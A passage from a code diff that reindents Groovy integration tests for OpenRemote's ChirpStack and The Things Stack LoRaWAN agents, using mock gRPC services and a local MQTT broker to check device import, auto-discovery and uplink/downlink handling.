+      void list(ListDevicesRequest request, StreamObserver<ListDevicesResponse> responseObserver) {
+        DeviceListItem device1 = DeviceListItem.newBuilder()
+                .setDevEui(DEV_EUI_1)
+                .setName(ASSET_NAME_1)
+                .setDeviceProfileId(PROFILE_ID)
                 .build()
-                .start()
-        }
+        DeviceListItem device2 = DeviceListItem.newBuilder()
+                .setDevEui(DEV_EUI_2)
+                .setName(ASSET_NAME_2)
+                .setDeviceProfileId(PROFILE_ID)
+                .build()
+        ListDevicesResponse response = ListDevicesResponse.newBuilder()
+                .addResult(device1)
+                .addResult(device2)
+                .setTotalCount(2)
+                .build()
 
-        void stop() {
-            if (server != null) {
-                server.shutdownNow()
-            }
-        }
-
-        private static class DeviceService extends DeviceServiceGrpc.DeviceServiceImplBase {
-            @Override
-            void list(ListDevicesRequest request, StreamObserver<ListDevicesResponse> responseObserver) {
-                DeviceListItem device1 = DeviceListItem.newBuilder()
-                    .setDevEui(DEV_EUI_1)
-                    .setName(ASSET_NAME_1)
-                    .setDeviceProfileId(PROFILE_ID)
-                    .build()
-                DeviceListItem device2 = DeviceListItem.newBuilder()
-                    .setDevEui(DEV_EUI_2)
-                    .setName(ASSET_NAME_2)
-                    .setDeviceProfileId(PROFILE_ID)
-                    .build()
-                ListDevicesResponse response = ListDevicesResponse.newBuilder()
-                    .addResult(device1)
-                    .addResult(device2)
-                    .setTotalCount(2)
-                    .build()
-
-                responseObserver.onNext(response)
-                responseObserver.onCompleted()
-            }
-        }
-
-        private static class DeviceProfileService extends DeviceProfileServiceGrpc.DeviceProfileServiceImplBase {
-            @Override
-            void get(GetDeviceProfileRequest request, StreamObserver<GetDeviceProfileResponse> responseObserver) {
-                if (PROFILE_ID != request.id) {
-                    responseObserver.onError(
-                        Status.NOT_FOUND
-                            .withDescription("Device profile not found: ${request.id}")
-                            .asRuntimeException()
-                    )
-                    return
-                }
-
-                DeviceProfile profile = DeviceProfile.newBuilder()
-                    .setName("TestProfile")
-                    .setId(request.getId())
-                    .putTags(ChirpStackProtocol.CHIRPSTACK_ASSET_TYPE_TAG, "ChirpStackTestAsset")
-                    .build()
-
-                GetDeviceProfileResponse response = GetDeviceProfileResponse.newBuilder()
-                    .setDeviceProfile(profile)
-                    .build()
-
-                responseObserver.onNext(response)
-                responseObserver.onCompleted()
-            }
-        }
+        responseObserver.onNext(response)
+        responseObserver.onCompleted()
+      }
     }
 
-    static class SubscriptionTracker extends AbstractInterceptHandler {
-        static final Logger LOG = Logger.getLogger(SubscriptionTracker.class.getName())
-        final Set<String> subscriptions = new CopyOnWriteArraySet<>()
-
-        @Override
-        String getID() { "SubscriptionTracker" }
-
-        @Override
-        void onSubscribe(InterceptSubscribeMessage msg) {
-            subscriptions.add(msg.getTopicFilter())
+    private static class DeviceProfileService extends DeviceProfileServiceGrpc.DeviceProfileServiceImplBase {
+      @Override
+      void get(GetDeviceProfileRequest request, StreamObserver<GetDeviceProfileResponse> responseObserver) {
+        if (PROFILE_ID != request.id) {
+          responseObserver.onError(
+                  Status.NOT_FOUND
+                  .withDescription("Device profile not found: ${request.id}")
+                  .asRuntimeException()
+                  )
+          return
         }
 
-        @Override
-        void onUnsubscribe(InterceptUnsubscribeMessage msg) {
-            subscriptions.remove(msg.getTopicFilter())
-        }
+        DeviceProfile profile = DeviceProfile.newBuilder()
+                .setName("TestProfile")
+                .setId(request.getId())
+                .putTags(ChirpStackProtocol.CHIRPSTACK_ASSET_TYPE_TAG, "ChirpStackTestAsset")
+                .build()
 
-        @Override
-        void onSessionLoopError(Throwable throwable) {
-            LOG.log(Level.SEVERE, "MQTT session loop error in SubscriptionTracker", throwable)
-        }
+        GetDeviceProfileResponse response = GetDeviceProfileResponse.newBuilder()
+                .setDeviceProfile(profile)
+                .build()
 
-        boolean containsTopic(String topic) {
-            return subscriptions.contains(topic)
-        }
+        responseObserver.onNext(response)
+        responseObserver.onCompleted()
+      }
     }
+  }
+
+  static class SubscriptionTracker extends AbstractInterceptHandler {
+    static final Logger LOG = Logger.getLogger(SubscriptionTracker.class.getName())
+    final Set<String> subscriptions = new CopyOnWriteArraySet<>()
+
+    @Override
+    String getID() {
+      "SubscriptionTracker"
+    }
+
+    @Override
+    void onSubscribe(InterceptSubscribeMessage msg) {
+      subscriptions.add(msg.getTopicFilter())
+    }
+
+    @Override
+    void onUnsubscribe(InterceptUnsubscribeMessage msg) {
+      subscriptions.remove(msg.getTopicFilter())
+    }
+
+    @Override
+    void onSessionLoopError(Throwable throwable) {
+      LOG.log(Level.SEVERE, "MQTT session loop error in SubscriptionTracker", throwable)
+    }
+
+    boolean containsTopic(String topic) {
+      return subscriptions.contains(topic)
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/lorawan/tts/TheThingsStackTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/lorawan/tts/TheThingsStackTest.groovy
@@ -76,629 +76,639 @@ import static ttn.lorawan.v3.Identifiers.*
 
 class TheThingsStackTest extends Specification implements ManagerContainerTrait {
 
-    static final String TENANT_ID = "ttn"
-    static final String API_KEY = "NNSXS.1234"
-    static final String APPLICATION_ID = "test-app-id"
-    static final String CLIENT_ID = "ttsAgentClientId"
-    static final String DEV_EUI_1 = "1111111111111111"
-    static final String DEV_EUI_2 = "2222222222222222"
-    static final String DEVICE_ID_1 = "device_id_1"
-    static final String DEVICE_ID_2 = "device_id_2"
-    static final String ASSET_NAME_1 = "Test Asset 1"
-    static final String ASSET_NAME_2 = "Test Asset 2"
-    static final String VENDOR_ID  = "dragino"
-    static final String MODEL_ID = "lht65"
-    static final String FIRMWARE_VERSION = "1.8"
-    static final String HOST = "localhost"
-    static final Integer UPLINK_PORT = 2
-    static final Integer DOWNLINK_PORT = 4
-    static final Double TEMPERATURE_VALUE = 20.4
-    static final Double HUMIDITY_VALUE = 56.4
+  static final String TENANT_ID = "ttn"
+  static final String API_KEY = "NNSXS.1234"
+  static final String APPLICATION_ID = "test-app-id"
+  static final String CLIENT_ID = "ttsAgentClientId"
+  static final String DEV_EUI_1 = "1111111111111111"
+  static final String DEV_EUI_2 = "2222222222222222"
+  static final String DEVICE_ID_1 = "device_id_1"
+  static final String DEVICE_ID_2 = "device_id_2"
+  static final String ASSET_NAME_1 = "Test Asset 1"
+  static final String ASSET_NAME_2 = "Test Asset 2"
+  static final String VENDOR_ID = "dragino"
+  static final String MODEL_ID = "lht65"
+  static final String FIRMWARE_VERSION = "1.8"
+  static final String HOST = "localhost"
+  static final Integer UPLINK_PORT = 2
+  static final Integer DOWNLINK_PORT = 4
+  static final Double TEMPERATURE_VALUE = 20.4
+  static final Double HUMIDITY_VALUE = 56.4
 
-    @Shared
-    int mqttBrokerPort
+  @Shared
+  int mqttBrokerPort
 
-    @Shared
-    Server mqttBroker
+  @Shared
+  Server mqttBroker
 
-    @Shared
-    SubscriptionTracker subTracker
+  @Shared
+  SubscriptionTracker subTracker
 
-    @Shared
-    int grpcPort
+  @Shared
+  int grpcPort
 
-    @Shared
-    TheThingsStackGrpcServer grpcServer
+  @Shared
+  TheThingsStackGrpcServer grpcServer
 
-    @Shared
-    Mqtt3AsyncClient mqttClient
+  @Shared
+  Mqtt3AsyncClient mqttClient
 
-    def setupSpec() {
-        mqttBrokerPort = findEphemeralPort()
-        def props = new Properties()
-        props.setProperty('port', mqttBrokerPort.toString())
-        props.setProperty('persistence_enabled', 'false')
-        def config = new MemoryConfig(props)
-        subTracker = new SubscriptionTracker()
-        mqttBroker = new Server()
-        mqttBroker.startServer(config, [subTracker])
+  def setupSpec() {
+    mqttBrokerPort = findEphemeralPort()
+    def props = new Properties()
+    props.setProperty('port', mqttBrokerPort.toString())
+    props.setProperty('persistence_enabled', 'false')
+    def config = new MemoryConfig(props)
+    subTracker = new SubscriptionTracker()
+    mqttBroker = new Server()
+    mqttBroker.startServer(config, [subTracker])
 
-        grpcPort = findEphemeralPort()
-        grpcServer = new TheThingsStackGrpcServer(grpcPort)
-        grpcServer.start()
+    grpcPort = findEphemeralPort()
+    grpcServer = new TheThingsStackGrpcServer(grpcPort)
+    grpcServer.start()
 
-        mqttClient = MqttClient.builder()
+    mqttClient = MqttClient.builder()
             .useMqttVersion3()
             .identifier("testClientId")
             .serverHost(HOST)
             .serverPort(mqttBrokerPort)
             .buildAsync()
-        mqttClient.connect().get(2, TimeUnit.SECONDS)
+    mqttClient.connect().get(2, TimeUnit.SECONDS)
+  }
+
+  def cleanupSpec() {
+    mqttClient?.disconnect()
+    mqttBroker?.stopServer()
+    grpcServer?.stop()
+  }
+
+  def setup() {
+    subTracker?.subscriptions.clear()
+  }
+
+  def cleanup() {
+    grpcServer?.shutdownEventStream()
+  }
+
+  def "TheThingsStack CSV Import Test"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a TheThingsStack agent is created"
+    def agent = new TheThingsStackAgent("TheThingsStackAgent")
+    agent.setRealm(MASTER_REALM)
+    agent.setHost(HOST)
+    agent.setPort(grpcPort)
+    agent.setSecureGRPC(false)
+    agent.setMqttHost(HOST)
+    agent.setMqttPort(mqttBrokerPort)
+    agent.setClientId(CLIENT_ID)
+    agent.setApplicationId(APPLICATION_ID)
+    agent.setTenantId(TENANT_ID)
+    agent.setApiKey(API_KEY)
+    agent = assetStorageService.merge(agent)
+
+    then: "the protocol instance for the agent should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((TheThingsStackProtocol)agentService.getProtocolInstance(agent.id)) != null
     }
 
-    def cleanupSpec() {
-        mqttClient?.disconnect()
-        mqttBroker?.stopServer()
-        grpcServer?.stop()
+    and: "the gRPC event stream connection should have been established"
+    conditions.eventually {
+      assert grpcServer.getEventObserverCount() == 1
     }
 
-    def setup() {
-        subTracker?.subscriptions.clear()
+    when: "the initial gRPC event has been received"
+    def streamStartEvent = TheThingsStackGrpcServer.createStreamStartEvent(APPLICATION_ID)
+    grpcServer.pushEvent(streamStartEvent)
+
+    then: "the connection status should be CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id)
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
     }
 
-    def cleanup() {
-        grpcServer?.shutdownEventStream()
-    }
-
-    def "TheThingsStack CSV Import Test"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
-
-        and: "a TheThingsStack agent is created"
-        def agent = new TheThingsStackAgent("TheThingsStackAgent")
-        agent.setRealm(MASTER_REALM)
-        agent.setHost(HOST)
-        agent.setPort(grpcPort)
-        agent.setSecureGRPC(false)
-        agent.setMqttHost(HOST)
-        agent.setMqttPort(mqttBrokerPort)
-        agent.setClientId(CLIENT_ID)
-        agent.setApplicationId(APPLICATION_ID)
-        agent.setTenantId(TENANT_ID)
-        agent.setApiKey(API_KEY)
-        agent = assetStorageService.merge(agent)
-
-        then: "the protocol instance for the agent should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((TheThingsStackProtocol)agentService.getProtocolInstance(agent.id)) != null
-        }
-
-        and: "the gRPC event stream connection should have been established"
-        conditions.eventually {
-            assert grpcServer.getEventObserverCount() == 1
-        }
-
-        when: "the initial gRPC event has been received"
-        def streamStartEvent = TheThingsStackGrpcServer.createStreamStartEvent(APPLICATION_ID)
-        grpcServer.pushEvent(streamStartEvent)
-
-        then: "the connection status should be CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id)
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
-
-        when: "an authenticated admin user"
-        def accessToken = authenticate(
+    when: "an authenticated admin user"
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             MASTER_REALM_ADMIN_USER,
             getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+            )
 
-        and: "the agent resource"
-        def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
+    and: "the agent resource"
+    def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
 
-        and: "CSV import is executed"
-        def csvContent = """\
+    and: "CSV import is executed"
+    def csvContent = """\
             ${DEV_EUI_1},${ASSET_NAME_1},TheThingsStackTestAsset,${VENDOR_ID},${MODEL_ID},${FIRMWARE_VERSION}
             ${DEV_EUI_2},${ASSET_NAME_2},TheThingsStackTestAsset,${VENDOR_ID},${MODEL_ID},${FIRMWARE_VERSION}
         """.stripIndent()
-        def fileInfo = new FileInfo("devices.csv", csvContent, false)
-        AssetTreeNode[] assets = agentResource.doProtocolAssetImport(null, agent.getId(), null, fileInfo)
+    def fileInfo = new FileInfo("devices.csv", csvContent, false)
+    AssetTreeNode[] assets = agentResource.doProtocolAssetImport(null, agent.getId(), null, fileInfo)
 
-        then: "new assets should have been imported"
-        conditions.eventually {
-            assert assets != null
-            assert assets.length == 2
-            def node1 = assets.find { it.asset.getAttribute(DEV_EUI).map { DEV_EUI_1.equalsIgnoreCase(it.value.get()) }.orElse(false) }
-            def node2 = assets.find { it.asset.getAttribute(DEV_EUI).map { DEV_EUI_2.equalsIgnoreCase(it.value.get()) }.orElse(false) }
-            assert node1 != null
-            assert node2 != null
-            def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-            def asset2 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_2.toUpperCase()))
-            assert asset1 != null
-            assert asset2 != null
-        }
+    then: "new assets should have been imported"
+    conditions.eventually {
+      assert assets != null
+      assert assets.length == 2
+      def node1 = assets.find {
+        it.asset.getAttribute(DEV_EUI).map {
+          DEV_EUI_1.equalsIgnoreCase(it.value.get())
+        }.orElse(false)
+      }
+      def node2 = assets.find {
+        it.asset.getAttribute(DEV_EUI).map {
+          DEV_EUI_2.equalsIgnoreCase(it.value.get())
+        }.orElse(false)
+      }
+      assert node1 != null
+      assert node2 != null
+      def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+      def asset2 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_2.toUpperCase()))
+      assert asset1 != null
+      assert asset2 != null
+    }
 
-        and: "MQTT wildcard subscription should have been registered"
-        conditions.eventually {
-            assert subTracker.containsTopic("v3/${APPLICATION_ID}@${TENANT_ID}/devices/+/up")
-        }
+    and: "MQTT wildcard subscription should have been registered"
+    conditions.eventually {
+      assert subTracker.containsTopic("v3/${APPLICATION_ID}@${TENANT_ID}/devices/+/up")
+    }
 
-        when: "the device sends a LoRaWAN uplink message"
-        def json = [
-            uplink_message: [
-                f_port: UPLINK_PORT,
-                decoded_payload: [
-                    Temperature: TEMPERATURE_VALUE,
-                    Humidity: HUMIDITY_VALUE,
-                    Errors: ["error1", "error2"]
-                ]
-            ]
+    when: "the device sends a LoRaWAN uplink message"
+    def json = [
+      uplink_message: [
+        f_port: UPLINK_PORT,
+        decoded_payload: [
+          Temperature: TEMPERATURE_VALUE,
+          Humidity: HUMIDITY_VALUE,
+          Errors: ["error1", "error2"]
         ]
-        mqttClient.publishWith()
+      ]
+    ]
+    mqttClient.publishWith()
             .topic("v3/${APPLICATION_ID}@${TENANT_ID}/devices/${DEVICE_ID_1}/up")
             .payload(JsonOutput.toJson(json).bytes)
             .send()
 
-        then: "asset attribute values should be updated"
-        conditions.eventually {
-            def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-            assertAttribute(asset, TEMPERATURE, TEMPERATURE_VALUE)
-            assertAttribute(asset, RELATIVE_HUMIDITY, HUMIDITY_VALUE)
-            assertAttribute(asset, ERRORS) { value ->
-                assert value.startsWith("[") && value.endsWith("]")
-                assert value.contains("error1") && value.contains("error2")
-            }
-        }
+    then: "asset attribute values should be updated"
+    conditions.eventually {
+      def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+      assertAttribute(asset, TEMPERATURE, TEMPERATURE_VALUE)
+      assertAttribute(asset, RELATIVE_HUMIDITY, HUMIDITY_VALUE)
+      assertAttribute(asset, ERRORS) { value ->
+        assert value.startsWith("[") && value.endsWith("]")
+        assert value.contains("error1") && value.contains("error2")
+      }
+    }
 
-        when: "an asset attribute value is written"
-        def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-        def downlinkMessages = new CopyOnWriteArrayList<String>()
-        mqttClient.subscribeWith()
+    when: "an asset attribute value is written"
+    def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+    def downlinkMessages = new CopyOnWriteArrayList<String>()
+    mqttClient.subscribeWith()
             .topicFilter("v3/${APPLICATION_ID}@${TENANT_ID}/devices/${DEVICE_ID_1}/down/push")
             .callback { Mqtt3Publish publish ->
-                downlinkMessages.add(new String(publish.payloadAsBytes))
+              downlinkMessages.add(new String(publish.payloadAsBytes))
             }
             .send()
             .get(5, TimeUnit.SECONDS)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, SWITCH, true))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, SWITCH, true))
 
-        then: "a LoRaWAN downlink message should have been published"
-        conditions.eventually {
-            assert downlinkMessages.size() == 1
-            def downlinkMessage = new JsonSlurper().parseText(downlinkMessages.get(0))
-            assert downlinkMessage != null
-            assert downlinkMessage.downlinks[0].f_port == DOWNLINK_PORT
-            assert downlinkMessage.downlinks[0].frm_payload == "DAE="
-        }
+    then: "a LoRaWAN downlink message should have been published"
+    conditions.eventually {
+      assert downlinkMessages.size() == 1
+      def downlinkMessage = new JsonSlurper().parseText(downlinkMessages.get(0))
+      assert downlinkMessage != null
+      assert downlinkMessage.downlinks[0].f_port == DOWNLINK_PORT
+      assert downlinkMessage.downlinks[0].frm_payload == "DAE="
+    }
+  }
+
+  def "TheThingsStack Auto-Discovery Test"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a TheThingsStack agent is created"
+    def agent = new TheThingsStackAgent("TheThingsStackAgent")
+    agent.setRealm(MASTER_REALM)
+    agent.setHost(HOST)
+    agent.setPort(grpcPort)
+    agent.setSecureGRPC(false)
+    agent.setMqttHost(HOST)
+    agent.setMqttPort(mqttBrokerPort)
+    agent.setClientId(CLIENT_ID)
+    agent.setApplicationId(APPLICATION_ID)
+    agent.setTenantId(TENANT_ID)
+    agent.setApiKey(API_KEY)
+    agent = assetStorageService.merge(agent)
+
+    then: "the protocol instance for the agent should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((TheThingsStackProtocol)agentService.getProtocolInstance(agent.id)) != null
     }
 
-    def "TheThingsStack Auto-Discovery Test"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    and: "the gRPC event stream connection should have been established"
+    conditions.eventually {
+      assert grpcServer.getEventObserverCount() == 1
+    }
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
+    when: "the initial gRPC event has been received"
+    def streamStartEvent = TheThingsStackGrpcServer.createStreamStartEvent(APPLICATION_ID)
+    grpcServer.pushEvent(streamStartEvent)
 
-        and: "a TheThingsStack agent is created"
-        def agent = new TheThingsStackAgent("TheThingsStackAgent")
-        agent.setRealm(MASTER_REALM)
-        agent.setHost(HOST)
-        agent.setPort(grpcPort)
-        agent.setSecureGRPC(false)
-        agent.setMqttHost(HOST)
-        agent.setMqttPort(mqttBrokerPort)
-        agent.setClientId(CLIENT_ID)
-        agent.setApplicationId(APPLICATION_ID)
-        agent.setTenantId(TENANT_ID)
-        agent.setApiKey(API_KEY)
-        agent = assetStorageService.merge(agent)
+    then: "the connection status should be CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id)
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+    }
 
-        then: "the protocol instance for the agent should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((TheThingsStackProtocol)agentService.getProtocolInstance(agent.id)) != null
-        }
+    when: "a sensor device sends data for the first time"
+    def uplinkEvent = TheThingsStackGrpcServer.createUplinkEvent(APPLICATION_ID, DEVICE_ID_1, DEV_EUI_1, "010A", 1, 101)
+    grpcServer.pushEvent(uplinkEvent)
 
-        and: "the gRPC event stream connection should have been established"
-        conditions.eventually {
-            assert grpcServer.getEventObserverCount() == 1
-        }
+    then: "a new asset should have been auto-discovered"
+    conditions.eventually {
+      def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+      assert asset != null
+    }
 
-        when: "the initial gRPC event has been received"
-        def streamStartEvent = TheThingsStackGrpcServer.createStreamStartEvent(APPLICATION_ID)
-        grpcServer.pushEvent(streamStartEvent)
+    when: "a device is created"
+    def createEvent = TheThingsStackGrpcServer.createEndDeviceCreateEvent(APPLICATION_ID, DEVICE_ID_2, DEV_EUI_2)
+    grpcServer.pushEvent(createEvent)
 
-        then: "the connection status should be CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id)
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
+    then: "a new asset should have been auto-discovered"
+    conditions.eventually {
+      def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_2.toUpperCase()))
+      assert asset != null
+    }
 
-        when: "a sensor device sends data for the first time"
-        def uplinkEvent = TheThingsStackGrpcServer.createUplinkEvent(APPLICATION_ID, DEVICE_ID_1, DEV_EUI_1, "010A", 1, 101)
-        grpcServer.pushEvent(uplinkEvent)
+    and: "MQTT wildcard subscription should have been registered"
+    conditions.eventually {
+      assert subTracker.containsTopic("v3/${APPLICATION_ID}@${TENANT_ID}/devices/+/up")
+    }
 
-        then: "a new asset should have been auto-discovered"
-        conditions.eventually {
-            def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-            assert asset != null
-        }
-
-        when: "a device is created"
-        def createEvent = TheThingsStackGrpcServer.createEndDeviceCreateEvent(APPLICATION_ID, DEVICE_ID_2, DEV_EUI_2)
-        grpcServer.pushEvent(createEvent)
-
-        then: "a new asset should have been auto-discovered"
-        conditions.eventually {
-            def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_2.toUpperCase()))
-            assert asset != null
-        }
-
-        and: "MQTT wildcard subscription should have been registered"
-        conditions.eventually {
-            assert subTracker.containsTopic("v3/${APPLICATION_ID}@${TENANT_ID}/devices/+/up")
-        }
-
-        when: "a device sends a LoRaWAN uplink message"
-        def json = [
-            uplink_message: [
-                f_port: UPLINK_PORT,
-                decoded_payload: [
-                    Temperature: TEMPERATURE_VALUE,
-                    Humidity: HUMIDITY_VALUE,
-                    Errors: ["error1", "error2"]
-                ]
-            ]
+    when: "a device sends a LoRaWAN uplink message"
+    def json = [
+      uplink_message: [
+        f_port: UPLINK_PORT,
+        decoded_payload: [
+          Temperature: TEMPERATURE_VALUE,
+          Humidity: HUMIDITY_VALUE,
+          Errors: ["error1", "error2"]
         ]
-        mqttClient.publishWith()
+      ]
+    ]
+    mqttClient.publishWith()
             .topic("v3/${APPLICATION_ID}@${TENANT_ID}/devices/${DEVICE_ID_1}/up")
             .payload(JsonOutput.toJson(json).bytes)
             .send()
 
-        then: "asset attribute values should be updated"
-        conditions.eventually {
-            def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-            assertAttribute(asset, TEMPERATURE, TEMPERATURE_VALUE)
-            assertAttribute(asset, RELATIVE_HUMIDITY, HUMIDITY_VALUE)
-            assertAttribute(asset, ERRORS) { value ->
-                assert value.startsWith("[") && value.endsWith("]")
-                assert value.contains("error1") && value.contains("error2")
-            }
-        }
+    then: "asset attribute values should be updated"
+    conditions.eventually {
+      def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+      assertAttribute(asset, TEMPERATURE, TEMPERATURE_VALUE)
+      assertAttribute(asset, RELATIVE_HUMIDITY, HUMIDITY_VALUE)
+      assertAttribute(asset, ERRORS) { value ->
+        assert value.startsWith("[") && value.endsWith("]")
+        assert value.contains("error1") && value.contains("error2")
+      }
+    }
 
-        when: "an asset attribute value is written"
-        def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-        def downlinkMessages = new CopyOnWriteArrayList<String>()
-        mqttClient.subscribeWith()
+    when: "an asset attribute value is written"
+    def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+    def downlinkMessages = new CopyOnWriteArrayList<String>()
+    mqttClient.subscribeWith()
             .topicFilter("v3/${APPLICATION_ID}@${TENANT_ID}/devices/${DEVICE_ID_1}/down/push")
             .callback { Mqtt3Publish publish ->
-                downlinkMessages.add(new String(publish.payloadAsBytes))
+              downlinkMessages.add(new String(publish.payloadAsBytes))
             }
             .send()
             .get(5, TimeUnit.SECONDS)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, SWITCH, true))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, SWITCH, true))
 
-        then: "a LoRaWAN downlink message should have been published"
-        conditions.eventually {
-            assert downlinkMessages.size() == 1
-            def downlinkMessage = new JsonSlurper().parseText(downlinkMessages.get(0))
-            assert downlinkMessage != null
-            assert downlinkMessage.downlinks[0].f_port == DOWNLINK_PORT
-            assert downlinkMessage.downlinks[0].frm_payload == "DAE="
-        }
+    then: "a LoRaWAN downlink message should have been published"
+    conditions.eventually {
+      assert downlinkMessages.size() == 1
+      def downlinkMessage = new JsonSlurper().parseText(downlinkMessages.get(0))
+      assert downlinkMessage != null
+      assert downlinkMessage.downlinks[0].f_port == DOWNLINK_PORT
+      assert downlinkMessage.downlinks[0].frm_payload == "DAE="
+    }
+  }
+
+  <T> void assertAttribute(Asset asset, AttributeDescriptor<T> descriptor, T expectedValue) {
+    def attrOpt = asset.getAttribute(descriptor)
+    assert attrOpt.isPresent() : "Attribute ${descriptor} is missing"
+
+    def valueOpt = attrOpt.get().value
+    assert valueOpt.isPresent() : "Value for attribute ${descriptor} is missing (it's empty)"
+
+    assert valueOpt.get() == expectedValue : "Expected ${expectedValue} but found ${valueOpt.get()}"
+  }
+
+  <T> void assertAttribute(Asset asset, AttributeDescriptor<T> descriptor, Closure validation) {
+    def attrOpt = asset.getAttribute(descriptor)
+    assert attrOpt.isPresent() : "Attribute ${descriptor} is missing"
+
+    def valueOpt = attrOpt.get().value
+    assert valueOpt.isPresent() : "Value for attribute ${descriptor} is missing (it's empty)"
+
+    validation(valueOpt.get())
+  }
+
+  static class TheThingsStackGrpcServer {
+    final int port
+    final EventsService eventsService
+    io.grpc.Server server
+
+    TheThingsStackGrpcServer(int port) {
+      this.port = port
+      this.eventsService = new EventsService()
     }
 
-    <T> void assertAttribute(Asset asset, AttributeDescriptor<T> descriptor, T expectedValue) {
-        def attrOpt = asset.getAttribute(descriptor)
-        assert attrOpt.isPresent() : "Attribute ${descriptor} is missing"
-
-        def valueOpt = attrOpt.get().value
-        assert valueOpt.isPresent() : "Value for attribute ${descriptor} is missing (it's empty)"
-
-        assert valueOpt.get() == expectedValue : "Expected ${expectedValue} but found ${valueOpt.get()}"
+    void start() {
+      server = ServerBuilder.forPort(port)
+              .addService(new DeviceService())
+              .addService(eventsService)
+              .build()
+              .start()
     }
 
-    <T> void assertAttribute(Asset asset, AttributeDescriptor<T> descriptor, Closure validation) {
-        def attrOpt = asset.getAttribute(descriptor)
-        assert attrOpt.isPresent() : "Attribute ${descriptor} is missing"
-
-        def valueOpt = attrOpt.get().value
-        assert valueOpt.isPresent() : "Value for attribute ${descriptor} is missing (it's empty)"
-
-        validation(valueOpt.get())
+    void stop() {
+      if (server != null) {
+        server.shutdownNow()
+      }
     }
 
-    static class TheThingsStackGrpcServer {
-        final int port
-        final EventsService eventsService
-        io.grpc.Server server
-
-        TheThingsStackGrpcServer(int port) {
-            this.port = port
-            this.eventsService = new EventsService()
-        }
-
-        void start() {
